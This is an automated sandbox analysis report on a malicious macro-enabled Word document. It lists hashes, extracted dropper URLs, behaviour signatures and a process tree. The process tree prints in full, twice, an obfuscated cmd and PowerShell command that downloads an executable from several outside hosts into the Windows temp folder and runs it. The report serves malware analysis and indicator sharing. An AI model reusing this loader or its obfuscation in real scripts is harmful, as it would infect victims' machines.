Analysis

  • max time kernel
    114s
  • max time network
    54s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    07-06-2022 17:47

General

  • Target

    1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm

  • Size

    94KB

  • MD5

    17160cfc8b8c0401f0d2063a615fb133

  • SHA1

    baba76bfcc698be2fd98574ba2bdcf894a9c3c16

  • SHA256

    1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020

  • SHA512

    e88185760d15ff0c0eb7f83a111393f4bb309387f6533875958f9f5fb5208ad0b2566157b5986db4462711bb2982fa5ac10a4e84803e11c2e5a1073fe54fdf3c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://japanijob.com/UUC8iEfIfb

exe.dropper

http://103.11.22.51/wp-content/uploads/yoarKX9

exe.dropper

http://13.126.28.98/hPwXcgCZBx

exe.dropper

http://159.65.146.232/ugitr4t4L

exe.dropper

http://159.65.65.213/iz1Cc1GhZ

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1788
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c set x=pow&& set y=ersh&& set z=ell&& call %x%%y%%z% $Lbi2C = '$zmlXw8L = new-obj000ect -com000obj000ect wsc000ript.she000ll;$OeRVbsv = new-object sys000tem.net.web000client;$C8OLj = new-object random;$nrwmj = \"000h000t000t000p000://japanijob.com/UUC8iEfIfb,000h000t000t000p000://103.11.22.51/wp-content/uploads/yoarKX9,000h000t000t000p000://13.126.28.98/hPwXcgCZBx,000h000t000t000p000://159.65.146.232/ugitr4t4L,000h000t000t000p000://159.65.65.213/iz1Cc1GhZ\".spl000it(\",\");$MRBKOMiTz = $C8OLj.nex000t(1, 65536);$l1u8gi4t = \"c:\win000dows\tem000p\95.ex000e\";for000each($iGSfRnt in $nrwmj){try{$OeRVbsv.dow000nlo000adf000ile($iGSfRnt.ToS000tring(), $l1u8gi4t);sta000rt-pro000cess $l1u8gi4t;break;}catch{}}'.replace('000', $j3ciVLYh);$OXlJrGA7 = '';iex($Lbi2C);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $Lbi2C = '$zmlXw8L = new-obj000ect -com000obj000ect wsc000ript.she000ll;$OeRVbsv = new-object sys000tem.net.web000client;$C8OLj = new-object random;$nrwmj = \"000h000t000t000p000://japanijob.com/UUC8iEfIfb,000h000t000t000p000://103.11.22.51/wp-content/uploads/yoarKX9,000h000t000t000p000://13.126.28.98/hPwXcgCZBx,000h000t000t000p000://159.65.146.232/ugitr4t4L,000h000t000t000p000://159.65.65.213/iz1Cc1GhZ\".spl000it(\",\");$MRBKOMiTz = $C8OLj.nex000t(1, 65536);$l1u8gi4t = \"c:\win000dows\tem000p\95.ex000e\";for000each($iGSfRnt in $nrwmj){try{$OeRVbsv.dow000nlo000adf000ile($iGSfRnt.ToS000tring(), $l1u8gi4t);sta000rt-pro000cess $l1u8gi4t;break;}catch{}}'.replace('000', $j3ciVLYh);$OXlJrGA7 = '';iex($Lbi2C);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1536
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1660

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1536-60-0x0000000000000000-mapping.dmp
    • memory/1536-68-0x000000006ABC0000-0x000000006B16B000-memory.dmp
      Filesize

      5.7MB

    • memory/1536-67-0x000000006ABC0000-0x000000006B16B000-memory.dmp
      Filesize

      5.7MB

    • memory/1536-64-0x0000000004B70000-0x00000000051C1000-memory.dmp
      Filesize

      6.3MB

    • memory/1536-65-0x000000006ABC0000-0x000000006B16B000-memory.dmp
      Filesize

      5.7MB

    • memory/1600-59-0x0000000000000000-mapping.dmp
    • memory/1660-63-0x000007FEFBF91000-0x000007FEFBF93000-memory.dmp
      Filesize

      8KB

    • memory/1660-62-0x0000000000000000-mapping.dmp
    • memory/1788-54-0x0000000072B31000-0x0000000072B34000-memory.dmp
      Filesize

      12KB

    • memory/1788-58-0x000000007159D000-0x00000000715A8000-memory.dmp
      Filesize

      44KB

    • memory/1788-57-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
      Filesize

      8KB

    • memory/1788-66-0x000000007159D000-0x00000000715A8000-memory.dmp
      Filesize

      44KB

    • memory/1788-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1788-55-0x00000000705B1000-0x00000000705B3000-memory.dmp
      Filesize

      8KB

    • memory/1788-69-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1788-70-0x000000007159D000-0x00000000715A8000-memory.dmp
      Filesize

      44KB